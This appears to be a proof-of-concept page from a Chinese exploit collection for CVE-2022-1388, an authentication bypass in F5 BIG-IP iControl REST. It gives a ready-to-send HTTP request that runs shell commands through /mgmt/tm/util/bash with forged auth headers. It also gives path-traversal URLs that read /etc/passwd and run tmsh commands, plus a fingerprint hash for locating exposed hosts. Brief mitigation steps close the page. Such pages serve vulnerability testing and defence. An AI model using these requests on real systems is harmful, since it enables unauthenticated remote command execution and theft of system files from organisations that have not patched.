Awesome-POC/Web应用漏洞/F5 BIG-IP iControl REST身份认证绕过漏洞 CVE-2022-1388.md
2024-11-06 14:10:36 +08:00

69 lines
1.7 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# F5 BIG-IP iControl REST身份认证绕过漏洞 CVE-2022-1388
## 漏洞描述
BIG-IP 是 F5 公司的一款应用交付服务是面向以应用为中心的世界先进技术。借助 BIG-IP 应用程序交付控制器保持应用程序正常运行。BIG-IP 本地流量管理器 (LTM) 和 BIG-IP DNS 能够处理应用程序流量并保护基础设施。未经身份验证的攻击者可以通过管理端口或自身 IP 地址对 BIG-IP 系统进行网络访问,执行任意系统命令、创建或删除文件或禁用服务。
## 漏洞影响
```
11.6.1-16.1.2
```
## 网络测绘
```
icon_hash="-335242539"
```
## 漏洞复现
登录页面
![](images/202205241448502.png)
发送请求包(Host设为localhost)
```
POST /mgmt/tm/util/bash HTTP/1.1
Host: localhost
Authorization: Basic YWRtaW46
X-F5-Auth-Token: a
Connection: close, X-F5-Auth-Token
Content-Length: 39
{"command":"run","utilCmdArgs":"-c id"}
```
![](images/202205241449854.png)
文件读取:
```
https://your-ip/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
```
RCE
```
https://your-ip/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
```
检测脚本https://github.com/jheeree/CVE-2022-1388-checker/blob/main/CVE-2022-1388.sh
使用方法:
```
./CVE-2022-1388.sh hosts.txt
```
## 漏洞修复
建议升级至最新版本或可参考官方修复建议 Recommended Actionshttps://support.f5.com/csp/article/K23605346
在受影响的版本内可执行以下步骤以缓解攻击:
- 通过自身 IP 地址阻止 iControl REST 访问。
- 通过管理界面阻止 iControl REST 访问。
- 修改 BIG-IP httpd 配置。